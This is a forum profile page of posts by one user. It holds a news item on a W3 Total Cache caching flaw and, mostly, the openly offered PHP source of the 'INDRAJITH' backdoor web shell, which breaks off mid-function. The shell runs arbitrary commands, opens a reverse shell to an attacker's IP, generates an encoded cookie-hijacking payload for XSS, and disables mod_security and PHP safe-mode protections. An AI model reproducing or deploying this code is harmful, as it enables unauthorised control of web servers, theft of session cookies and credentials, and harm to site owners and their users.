Jump to content

Fi8sVrs

Active Members
  • Posts

    3206
  • Joined

  • Days Won

    87

Everything posted by Fi8sVrs

  1. Fi8sVrs

    Sugestie

    https://rstforums.com/forum/55076-forum-privacy.rst
  2. W3 Total Cache has faulty defaults Sorry to spoil the day for any sysadmins that thought today would be a slow day, but a security researcher has announced a serious vulnerability in the default configuration of a popular WordPress plugin. W3 Total Cache, which boasts high-traffic sites like Mashable and Lockergnome among its users, has serious vulnerabilities, according to this post on the Full Disclosure list. The default setup – that is, when users simply choose “add plugin” from the WordPress catalogue – left cache directory listings enabled, according to poster Jason Donenfield. This, he said, allows database cache keys to be downloaded on vulnerable installations – and that could expose password hashes. “A simple google search of inurl:wp-content/plugins/w3tc/dbcache and maybe some other magic reveals this wasn't just an issue for me”, he writes. Donenfield later amended the search term to inurl:wp-content/w3tc “Even with directory listings off,” he continues, “cache files are by default publicly downloadable, and the key values / file name of the database cache items are easily predictable.” Donenfield says the developer of the plug-in intends to release a fix “soon”. In the meantime, he notes that “deny from all” should be set in the .htaccess file. ® via New WordPress vuln emerges • The Register
  3. Fi8sVrs

    Yahoo !

    vorbeste cu ei direct si explicale problema in timp real Yahoo! Help | Customer Care - How can we help you?
  4. This is a mini-php backdoor shell. <?php /* * originally scripted by AJITH KP and VISHNUNATH KP */ /*------------------ LOGIN -------------------*/ $usernameame="ajithkp560"; $password="ajithkp560"; $email="ajithkp560@gmail.com"; /*------------------ Login Data End ----------*/ @error_reporting(5); /*------------------ Anti Crawler ------------*/ if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } /*------------------ End of Anti Crawler -----*/ echo "<link href=data:image/gif;base64,R0lGODlhEAAQAPcAADGcADmcADmcCEKcEEKlEEqlGEqlIVKlIVKtIVKtKVqtMWO1OWu1Qmu1SnO1SnO9SnO9Unu9WoS9Y4TGY4zGa4zGc5TGc5TOc5TOe5zOe5zOhK3WlLXepb3ercbntcbnvc7nvc7nxtbvzt7vzt7v1uf33u/35+/37/f37/f/9///9////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////ywAAAAAEAAQAAAIxwA7ABhIsGBBgQEAJAwwgIGEBQojEhQwcIEFDRUUUCS4UCEEjAc2RhQJoIGGCAIERODQQOLAAAc0SABwgEMIDgoSShQgAcMAAx08OBCgEYDImA0CbPiwoICHFBIoDogAwAGGAgpCVBggYgUHAwU2nFgBQEIFARVAGNCwAkNVEytCzKwwc0MHASVICHCQ4gTKgRJaVtAgQAQGBSdMJCDZ0WiADyoYAOCg4eVAkQpWCBRgIoTOjTotrHAwECwAgZYpdkBRQGKHgAAAOw== rel=icon type=image/x-icon />"; echo "<style> html { background:url(http://www.ajithkp560.hostei.com/images/background.gif) black; } #loginbox { font-size:11px; color:green; width:1000px; height:200px; border:1px solid #4C83AF; background-color:#111111; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; } input { font-size:11px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; } loginbox td { border-radius:5px; font-size:11px; } .header { size:25px; color:green; } h1 { font-family:DigifaceWide; color:green; font-size:200%; } h1:hover { text-shadow:0 0 20px #00FFFF, 0 0 100px #00FFFF; } .go { height: 50px; width: 50px;float: left; margin-right: 10px; display: none; background-color: #090;} .input_big { width:75px; height:30px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; font-size:17px; } hr { border:1px solid #222222; } #meunlist { width: auto; height: auto; font-size: 12px; font-weight: bold; } #meunlist ul { padding-top: 5px; padding-right: 5px; padding-bottom: 7px; padding-left: 2px; text-align:center; list-style-type: none; margin: 0px; } #meunlist li { margin: 0px; padding: 0px; display: inline; } #meunlist a { font-size: 14px; text-decoration:none; font-weight: bold;color:green;clear: both;width: 100px;margin-right: -6px; padding-top: 3px; padding-right: 15px; padding-bottom: 3px; padding-left: 15px; } #meunlist a:hover { background: #222; color:green; border-left:1px solid green; border-right:1px solid green; } .menubar {-moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; } .menu { font-size:25px; color: } .textarea_edit { background-color:#111111; border:1px groove #333; color:#999; color:green; } .textarea_edit:onfocus { text-decoration:none; border:1px solid green; } .input_butt {font-size:11px; background:#191919; color:#4C83AF; margin:0 4px; border:1px solid #222222;} #result{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; min-height:100px;} .table{ width:100%; padding:4px 0; color:#888; font-size:15px; } .table a{ text-decoration:none; color:green; font-size:15px; } .table a:hover{text-decoration:underline;} .table td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:top; } .table th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; } .table tr:hover{ background:#181818; } .tbl{ width:100%; padding:4px 0; color:#888; font-size:15px; text-align:center; } .tbl a{ text-decoration:none; color:green; font-size:15px; vertical-align:middle; } .tbl a:hover{text-decoration:underline;} .tbl td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:middle; width: 300px; } .tbl th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; vertical-align:middle; } .tbl td:hover{ background:#181818; } #alert {position: relative;} #alert:hover:after {background: hsla(0,0%,0%,.8);border-radius: 3px;color: #f6f6f6;content: 'Click to dismiss';font: bold 12px/30px sans-serif;height: 30px;left: 50%;margin-left: -60px;position: absolute;text-align: center;top: 50px; width: 120px;} #alert:hover:before {border-bottom: 10px solid hsla(0,0%,0%,.8);border-left: 10px solid transparent;border-right: 10px solid transparent;content: '';height: 0;left: 50%;margin-left: -10px;position: absolute;top: 40px;width: 0;} #alert:target {display: none;} .alert_red {animation: alert 1s ease forwards;background-color: #c4453c;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;} .alert_green {animation: alert 1s ease forwards;background-color: #43CD80;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;} @keyframes alert {0% { opacity: 0; }50% { opacity: 1; }100% { top: 0; }} </style>"; if($_COOKIE["user"] != $usernameame && $_COOKIE["pass"] != md5($password)) { if($_POST["usrname"]==$usernameame && $_POST["passwrd"]==$password) { print'<script>document.cookie="user='.$_POST["usrname"].';";document.cookie="pass='.md5($_POST["passwrd"]).';";</script>'; } else { if($_POST['usrname']) { print'<script>alert("Sorry... Wrong UserName/PassWord");</script>'; } echo '<title>INDRAJITH SHELL</title><center> <div id=loginbox><p><font face="verdana,arial" size=-1> <font color=orange>>>>>>>>>>></font><font color=white>>>>>><<<<<</font><font color=green>>>>>>>>>>></font> <center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'> <tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>INDRAJITH SHELL</b></font></th></tr> <tr><td bgcolor="black" style="padding:5"> <form method="post"> <input type="hidden" name="action" value="login"> <input type="hidden" name="hide" value=""> <center><table> <tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" value="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr> <tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="passwrd" value="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr> <tr><td><font face="verdana,arial" size=-1> </font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Enter"></font></td></tr></table> </div><br /></center>'; exit; } } $color_g="green"; $color_b="4C83AF"; $color_bg="#111111"; $color_hr="#222"; $color_wri="green"; $color_rea="yellow"; $color_non="red"; $path=$_GET['path']; @session_start(); //@error_reporting(5); @set_time_limit(0); @ini_restore("safe_mode_include_dir"); @ini_restore("safe_mode_exec_dir"); @ini_restore("disable_functions"); @ini_restore("allow_url_fopen"); @ini_restore("safe_mode"); @ini_restore("open_basedir"); $sep="/"; if(strtolower(substr(PHP_OS,0,3))=="win") { $os="win"; $sep="\\"; $ox="Windows"; } else { $os="nix"; $ox="Linux"; } $self=$_SERVER['PHP_SELF']; $srvr_sof=$_SERVER['SERVER_SOFTWARE']; $your_ip=$_SERVER['REMOTE_ADDR']; $srvr_ip=$_SERVER['SERVER_ADDR']; $admin=$_SERVER['SERVER_ADMIN']; $s_php_ini="safe_mode=OFF disable_functions=NONE"; $ini_php="<? echo ini_get(\"safe_mode\"); echo ini_get(\"open_basedir\"); include(\$_GET[\"file\"]); ini_restore(\"safe_mode\"); ini_restore(\"open_basedir\"); echo ini_get(\"safe_mode\"); echo ini_get(\"open_basedir\"); include(\$_GET[\"ss\"]); ?>"; $s_htaccess="<IfModule mod_security.c> Sec------Engine Off Sec------ScanPOST Off </IfModule>"; $s_htaccess_pl="Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .sh AddHandler cgi-script .pl AddHandler cgi-script .pl"; $sym_htaccess="Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any"; $sym_php_ini="safe_mode=OFF disable_functions=NONE"; $forbid_dir="Options -Indexes"; $cookie_highjacker="rVVdc5pAFH13xv9wh3Eipq22M3miasaJGGmNWsS2mU6HQVyEFlnCLkk7If+9d8EPCKFtpuVB2d1z7z177gf1Wvc8dMN6rXP6av/AJQlIZHGyBouBBaEVcaAOaNOhPninGWNYjNXJBMKIfiM2h53Zaadec+LA5h4N0AXX5nKrXruv1wAfzwF5QzgJbmVpbBhz82KiqVPD1OZSC05OgPHIthixt2El7CVIcfA9oHeB1GplXnfOxdPwQuhBle3bDPiQ/RGfkTKjz+Zopn8a6EN1KN5+z6sEfja7koc/cNTVq5mhmoPhsJpaAfMcRgXDCiIeY4TLDXOh6h9V/UszZ9P8mjKqOHtEtgL1N3QrTMuEK+wPEYoWEeFxFMiIEXd/yJWxTzdDi1u5QkbQhG56kk0Dx9vE2CaIY23+g++dNmxKv3ukQPfDUtWvzYWha9PLA99GRDYe4yQyNz5dWT5DE3lFqd8CL/BMzI3cPEJSRHOfHJGQkn2rmNWCSHvDNJ0ZbNejeHDgszVDis3+hNLzmW4cmccMo1obEhSxaWEvcWUOLrH1cje9YdzcEu7SdcHgSjXGs2Feka3pUvYkg/FskfdIHBKRqBxeV0eqrh6rorHGSdYTPyBLPqwXYpSN4BpcxVMYDA713sBk9xwakkCWsixLWJPWC+mokFA9RNXNrcVtV5Y6K5dvVx0PgZlFC5IESgi/ACkXtxPGnMkiPgbU5kqanwSE5EouKwkICZScSgkMRA6UQkISyFRVirIngMooR+ESGA4M9R4UeMg0wp2L2ey9pirHGu6uov5TA+F/XuGf7pBeQqm+QBA8pu/YPmUkpbrr9kOT45LYLgWpXuuKtPW7LrHWfVxxj/ukf/b6DKaUw4jGwbrbyTbxtJPCuiu6/imW7pt+DoUr3Av7hktw0NzEhIkP61KfgNQuFDnOiIVhLnUNJ2Zbgjv89gboxhFuAGcRdz0GKNEtidrdTpgGTkOKwXOOy18="; /*----------------------- Top Menu ------------------------------------------*/ if($safemode=="On") { echo "<div id='alert'><a class=\"alert_red\" href=\"#alert\">Safe Mode : <font color=green>ON</font></a></div>"; } else { echo "<div id='alert'><a class=\"alert_green\" href=\"#alert\">Safe Mode : <font color=red>OFF</font></a></div>"; } echo "<script src=\"http://code.jquery.com/jquery-latest.js\"></script><script>$(\"#alert\").delay(2000).fadeOut(300);</script>"; echo "<title>INDRAJITH SHELL</title><div id=result> <table> <tbody> <tr> <td style='border-right:1px solid #104E8B;' width=\"300px;\"> <div style='text-align:center;'> <a href='?' style='text-decoration:none;'><h1>INDRAJITH</h1></a><font color=blue>MINI SHELL</font> </div> </td> <td> <div class=\"header\">OS</font> <font color=\"#666\" >:</font> ".$ox." </font> <font color=\"#666\" >|</font> ".php_uname()."<br /> Your IP : <font color=red>".$your_ip."</font> <font color=\"#666\" >|</font> Server IP : <font color=red>".$srvr_ip."</font> <font color=\"#666\" > | </font> Admin <font color=\"#666\" > : </font> <font color=red> {$admin} </font> <br /> MySQL <font color=\"#666\" > : </font>"; echo mysqlx(); echo "<font color=\"#666\" > | </font> Oracle <font color=\"#666\" > : </font>"; echo oraclesx(); echo "<font color=\"#666\" > | </font> MSSQL <font color=\"#666\" > : </font>"; echo mssqlx(); echo "<font color=\"#666\" > | </font> PostGreySQL <font color=\"#666\" > : </font>";echo postgreyx(); echo "<br />cURL <font color=\"#666\" > : </font>";echo curlx(); echo "<font color=\"#666\" > | </font>Total Space<font color=\"#666\" > : </font>"; echo disc_size(); echo "<font color=\"#666\" > | </font>Free Space<font color=\"#666\" > : </font>"; echo freesize(); echo "<br />Software<font color=\"#666\" > : </font><font color=red>{$srvr_sof}</font><font color=\"#666\" > | </font> PHP<font color=\"#666\" > : </font><a style='color:red; text-decoration:none;' target=_blank href=?phpinfo>".phpversion()."</a> <br />Disabled Functions<font color=\"#666\" > : </font></font><font color=red>";echo disabled_functns()."</font><br />"; if($os == 'win'){ echo "Drives <font color=\"#666\" > : </font>";echo drivesx(); } echo " </div> </td> </tr> </tbody> </table></div>"; echo "<div class='menubar'> <div id=\"meunlist\"> <ul> <li><a href=\"?\">HOME</a></li> <li><a href=\"?symlink\">SymLink</a></li> <li><a href=\"?rs\">Reverse Shell</a></li> <li><a href=\"?cookiejack\">Cookie HighJack</a></li> <li><a href=\"?encodefile\">PHP Encode/Decode</a></li> <li><a href=\"?path={$path}&safe_mod\">Safe Mode Fucker</a></li> <li><a href=\"?path={$path}&forbd_dir\">Directory Listing Forbidden</a></li> </ul> <ul> <li><a href=\"?massmailer\">Mass Mailer</a></li> <li><a href=\"?cpanel_crack\">CPANEL Crack</a></li> <li><a href=\"?server_exploit_details\">Exploit Details</a></li> <li><a href=\"?remote_server_scan\">Remote Server Scanner</a></li> <li><a href=\"?remotefiledown\">Remote File Downloader</a></li> <li><a href=\"?hexenc\">Hexa Encode/Decode</a></li> <li><a href=\"?killme\"><font color=red>Kill Me</font></a></li> <li><a href=\"?about_us\">About us</a></li> </ul> </div></div>"; /*----------------------- End of Top Menu -----------------------------------*/ /*--------------- FUNCTIONS ----------------*/ function alert($alert_txt) { echo "<script>alert('".$alert_txt."');window.location.href='?';</script>"; } function disabled_functns() { if(!@ini_get('disable_functions')) { echo "None"; } else { echo @ini_get('disable_functions'); } } function drivesx() { foreach(range('A','Z') as $drive) { if(is_dir($drive.':\\')) { echo "<a style='color:green; text-decoration:none;' href='?path=".$drive.":\\'>[".$drive."]</a>"; } } } function filesizex($size) { if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB"; elseif ($size>=1048576)$size = round(($size/1048576),2)." MB"; elseif ($size>=1024)$size = round(($size/1024),2)." KB"; else $size .= " B"; return $size; } function disc_size() { echo filesizex(disk_total_space("/")); } function freesize() { echo filesizex(disk_free_space("/")); } function file_perm($filz){ if($m=fileperms($filz)){ $p=''; $p .= ($m & 00400) ? 'r' : '-'; $p .= ($m & 00200) ? 'w' : '-'; $p .= ($m & 00100) ? 'x' : '-'; $p .= ($m & 00040) ? 'r' : '-'; $p .= ($m & 00020) ? 'w' : '-'; $p .= ($m & 00010) ? 'x' : '-'; $p .= ($m & 00004) ? 'r' : '-'; $p .= ($m & 00002) ? 'w' : '-'; $p .= ($m & 00001) ? 'x' : '-'; return $p; } else return "?????"; } function mysqlx() { if(function_exists('mysql_connect')) { echo "<font color='red'>Enabled</font>"; } else { echo "<font color='green'>Disabled</font>"; } } function oraclesx() { if(function_exists('oci_connect')) { echo "<font color='red'>Enabled</font>"; } else { echo "<font color='green'>Disabled</font>"; } } function mssqlx() { if(function_exists('mssql_connect')) { echo "<font color='red'>Enabled</font>"; } else { echo "<font color='green'>Disabled</font>"; } } function postgreyx() { if(function_exists('pg_connect')) { echo "<font color='red'>Enabled</font>"; } else { echo "<font color='green'>Disabled</font>"; } } function curlx() { if(function_exists('curl_version')) { echo "<font color='red'>Enabled</font>"; } else { echo "<font color='green'>Disabled</font>"; } } function filesize_$filex) { $f_size=filesizex(filesize($filex)); return $f_size; } function rename_ui() { $rf_path=$_GET['rename']; echo "<div id=result><center><h2>Rename</h2><hr /><p><br /><br /><form method='GET'><input type=hidden name='old_name' size='40' value=".$rf_path.">New Name : <input name='new_name' size='40' value=".basename($rf_path)."><input type='submit' value=' >>> ' /></form></p><br /><br /><hr /><br /><br /></center></div>"; } function filemanager_bg() { global $sep, $self; $path=!empty($_GET['path'])?$_GET['path']:getcwd(); $dirs=array(); $fils=array(); if(is_dir($path)) { chdir($path); if($handle=opendir($path)) { while(($item=readdir($handle))!==FALSE) { if($item=="."){continue;} if($item==".."){continue;} if(is_dir($item)) { array_push($dirs, $path.$sep.$item); } else { array_push($fils, $path.$sep.$item); } } } else { alert("Access Denied for this operation"); } } else { alert("Directory Not Found!!!"); } echo "<div id=result><table class=table> <tr> <th width='500px'>Name</th> <th width='100px'>Size</th> <th width='100px'>Permissions</th> <th width='500px'>Actions</th> </tr>"; foreach($dirs as $dir) {//chdir(isset($_GET['path'])) echo "<tr><td><a href={$self}?path={$dir}>".basename($dir)."</a></td> <td>".filesize_$dir)."</td> <td><a href={$self}?path={$path}&perm={$dir}>".file_perm($dir)."</a></td> <td><a href={$self}?path={$path}&del_dir={$dir}>Delete</a> | <a href={$self}?path={$path}&rename={$dir}>Rename</a></td></tr>"; } foreach($fils as $fil) { echo "<tr><td><a href={$self}?path={$path}&read={$fil}>".basename($fil)."</a></td> <td>".filesize_$fil)."</td> <td><a href={$self}?path={$path}&perm={$fil}>".file_perm($fil)."</a></td> <td><a href={$self}?path={$path}&del_fil={$fil}>Delete</a> | <a href={$self}?path={$path}&rename={$fil}>Rename</a> | <a href={$self}?path={$path}&edit={$fil}>Edit</a> | <a href={$self}?path={$path}&down={$fil}>Download</a> | <a href={$self}?path={$path}©={$fil}>Copy</a> </td>"; } echo "</tr></table></div>"; } function rename_bg() { if(isset($_GET['old_name']) && isset($_GET['new_name'])) { $o_r_path=basename($_GET['old_name']); $r_path=str_replace($o_r_path, "", $_GET['old_name']); $r_new_name=$r_path.$_GET['new_name']; echo $r_new_name; if(rename($_GET['old_name'], $r_new_name)==FALSE) { alert("Access Denied for this action!!!"); } else { alert("Renamed File Succeessfully"); } } } function edit_file() { $path=$_GET['path']; chdir($path); $edt_file=$_GET['edit']; $e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file))); if($e_content) { $o_content=$e_content; } else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof')) { $fd = fopen($edt_file, "rb"); if(!$fd) { alert("Permission Denied"); } else { while(!feof($fd)) { $o_content=wordwrap(htmlspecialchars(fgets($fd))); } } fclose($fd); } echo "<div id='result'><br /><font color=red>View File</font> : <font color=green><a style='text-decoration:none; color:green;' href='?read=".$_GET['edit']."'>". basename($_GET['edit']) ."</a><br /><br /><hr /><br /></font><form method='POST'><input type='hidden' name='e_file' value=".$_GET['edit']."> <center><textarea spellcheck='false' class='textarea_edit' name='e_content_n' cols='80' rows='25'>".$o_content."</textarea></center><hr /> <input class='input_big' name='save' type='submit' value=' Save ' /></div>"; } function edit_file_bg() { if(file_exists($_POST['e_file'])) { $handle = fopen($_POST['e_file'],"w+"); if (!handle) { alert("Permission Denied"); } else { fwrite($handle,$_POST['e_content_n']); alert("Your changes were Successfully Saved!"); } fclose($handle); } else { alert("File Not Found!!!"); } } function delete_file() { $del_file=$_GET['del_fil']; if(unlink($del_file) != FALSE) { alert("Deleted Successfully"); exit; } else { alert("Access Denied for this Operation"); exit; } } function deldirs($d_dir) { $d_files= glob($d_dir.'*', GLOB_MARK); foreach($d_files as $d_file) { if(is_dir($d_file)) { deldirs($d_file); } else { unlink($d_file); } } if(is_dir($d_dir)) { if(rmdir($d_dir)) { alert("Deleted Directory Successfully"); } else { alert("Access Denied for this Operation"); } } } function download() { $d_file=$_GET['down']; $d_name=basename($d_file); if (file_exists($d_file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='. basename($d_file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($d_file)); ob_clean(); readfile($d_file); exit; } } function code_viewer() { $path=$_GET['path']; $r_file=$_GET['read']; $r_content = wordwrap(htmlspecialchars(file_get_contents($r_file))); if($r_content) { $rr_content=$r_content; } else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof')) { $fd = fopen($r_file, "rb"); if (!$fd) { alert("Permission Denied"); } else { while(!feof($fd)) { $rr_content=wordwrap(htmlspecialchars(fgets($fd))); } } fclose($fd); } echo "<div id=result><br /><font color=red>Edit File</font><font color=green> : </font><font color=#999><a style='text-decoration:none; color:green;' href='?path={$path}&edit=".$_GET['read']."'>". basename($_GET['read']) ."</a></font><br /><br /><hr /><pre><code>".$rr_content."</code></pre></div>"; } function copy_file_ui() { echo "<div id=result><center><h2>Copy File</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td style='text-align:center;'>Copy : <input size=40 name='c_file' value=".$_GET['copy']." > To : <input size=40 name='c_target' value=".$_GET['path'].$sep."> Name : <input name='cn_name'><input type='submit' value=' >> ' /></form></table><br /><br /><hr /><br /><br /><br /></center></div>"; } function copy_file_bg() { global $sep; if(function_exists(copy)) { if(copy($_GET['c_file'], $_GET['c_target'].$sep.$_GET['cn_name'])) { alert("Succeded"); } else { alert("Access Denied"); } } } function ch_perm_bg() { if(isset($_GET['p_filex']) && isset($_GET['new_perm'])) { if(chmod($_GET['p_filex'], $_GET['new_perm']) !=FALSE) { alert("Succeded. Permission Changed!!!"); } else { alert("Access Denied for This Operation"); } } } function ch_perm_ui() { $p_file=$_GET['perm']; echo "<div id =result><center><p><form method='GET'><input type='hidden' name='path' value=".getcwd()." ><input name='p_filex' type=hidden value={$p_file} >New Permission : <input name='new_perm' isze='40' value=".substr(sprintf('%o', fileperms($p_file)), -3)."><input type='submit' value=' >> ' /></form></p></center></div>"; ch_perm_bg(); } function mk_file_ui() { chdir($_GET['path']); echo "<div id=result><br /><br /><font color=red><form method='GET'> <input type='hidden' name='path' value=".getcwd()."> New File Name : <input size='40' name='new_f_name' value=".$_GET['new_file']."></font><br /><br /><hr /><br /><center> <textarea spellcheck='false' cols='80' rows='25' class=textarea_edit name='n_file_content'></textarea></center><hr /> <input class='input_big' type='submit' value=' Save ' /></form></center></div>"; } function mk_file_bg() { chdir($_GET['path']); $c_path=$_GET['path']; $c_file=$_GET['new_f_name']; $c_file_contents=$_GET['n_file_content']; $handle=fopen($c_file, "w"); if(!$handle) { alert("Permission Denied"); } else { fwrite($handle,$c_file_contents); alert("Your changes were Successfully Saved!"); } fclose($handle); } function create_dir() { chdir($_GET['path']); $new_dir=$_GET['new_dir']; if(is_writable($_GET['path'])) { mkdir($new_dir); alert("Direcory Created Successfully"); exit; } else { alert("Access Denied for this Operation"); exit; } } function cmd($cmd) { chdir($_GET['path']); $res=""; if($_GET['cmdexe']) { $cmd=$_GET['cmdexe']; } if(function_exists('shell_exec')) { $res=shell_exec($cmd); } else if(function_exists('exec')) { exec($cmd,$res); $res=join("\n",$res); } else if(function_exists('system')) { ob_start(); system($cmd); $res = ob_get_contents(); ob_end_clean(); } elseif(function_exists('passthru')) { ob_start(); passthru($cmd); $res=ob_get_contents(); ob_end_clean(); } else if(function_exists('proc_open')) { $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $handle = proc_open($cmd ,$descriptorspec , $pipes); if(is_resource($handle)) { if(function_exists('fread') && function_exists('feof')) { while(!feof($pipes[1])) { $res .= fread($pipes[1], 512); } } else if(function_exists('fgets') && function_exists('feof')) { while(!feof($pipes[1])) { $res .= fgets($pipes[1],512); } } } pclose($handle); } else if(function_exists('popen')) { $handle = popen($cmd , "r"); if(is_resource($handle)) { if(function_exists('fread') && function_exists('feof')) { while(!feof($handle)) { $res .= fread($handle, 512); } } else if(function_exists('fgets') && function_exists('feof')) { while(!feof($handle)) { $res .= fgets($handle,512); } } } pclose($handle); } $res=wordwrap(htmlspecialchars($res)); if($_GET['cmdexe']) { echo "<div id=result><center><font color=green><h2>r00t@TOF:~#</h2></center><hr /><pre>".$res."</font></pre></div>"; } return $res; } function upload_file() { chdir($_POST['path']); if(move_uploaded_file($_FILES['upload_f']['tmp_name'],$_FILES['upload_f']['name'])) { alert("Uploaded File Successfully"); } else { alert("Access Denied!!!"); } } function reverse_conn_ui() { global $your_ip; echo "<div id='result'> <center><h2>Reverse Shell</h2><hr /> <br /><br /><form method='GET'><table class=tbl> <tr> <td><select name='rev_option' style='color:green; background-color:black; border:1px solid #666;'> <option>PHP Reverse Shell</option> </select></td></tr><tr> <td>Your IP : <input name='my_ip' value=".$your_ip."> PORT : <input name='my_port' value='560'> <input type='submit' value=' >> ' /></td></tr></form> <tr></tr> <tr><td><font color=red>PHP Reverse Shell</font>:<font color=green> nc -l -p <i>port</i></font></td></tr></table> </div>"; } function reverse_conn_bg() { global $os; $option=$_REQUEST['rev_option']; $ip=$_GET['my_ip']; $port=$_GET['my_port']; if($option=="PHP Reverse Shell") { echo "<div id=result><h2>RESULT</h2><hr /><br />"; function printit ($string) { if (!$daemon) { print "$string\n"; } } $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("<font color=green>Successfully opened reverse shell to $ip:$port </font>"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); echo "<br /><br /><hr /><br /><br /></div>"; } } function cookie_jack() { global $cookie_highjacker; echo "<div id=result><center><h2>NOTICE</h2><hr/>"; if(function_exists('fopen') && function_exists('fwrite')) { $cook=gzinflate(base64_decode($cookie_highjacker)); $han_le=fopen("jith_cookie.php", "w+"); if($han_le) { fwrite($han_le, $cook); echo "Yes... Cookie highjacker is generated.<br /> Name : <font color=green>jith_cookie.php</font>.<br /> Rename it as 404.php or what you like and highjack cookie of your target.<br />It is useable in XSS<br />It will make a file <font color=red>configuration.txt</font> in this direcory and save the cookie value in it. cheers...<br /><br /><hr /><br /><br /></center></div>"; } else { echo "<font color=red>Sorry... Generate COOKIE HIGHJACKER failed<br /><br /><hr /><br /><br /></center></div>"; } } } function safe_mode_fuck() { global $s_php_ini,$s_htaccess,$s_htaccess_pl,$ini_php; $path = chdir($_GET['path']); chdir($_GET['path']); switch($_GET['safe_mode']) { case "s_php_ini": $s_file=$s_php_ini; $s_name="php.ini"; break; case "s_htaccess": $s_name=".htaccess"; $s_file=$s_htaccess; break; case "s_htaccess_pl": $s_name=".htaccess"; $s_file=$s_htaccess_pl; break; case "s_ini_php": $s_name="ini.php"; $s_file=$ini_php; } if(function_exists('fopen')&& function_exists('fwrite')) { $s_handle=fopen("$s_name", 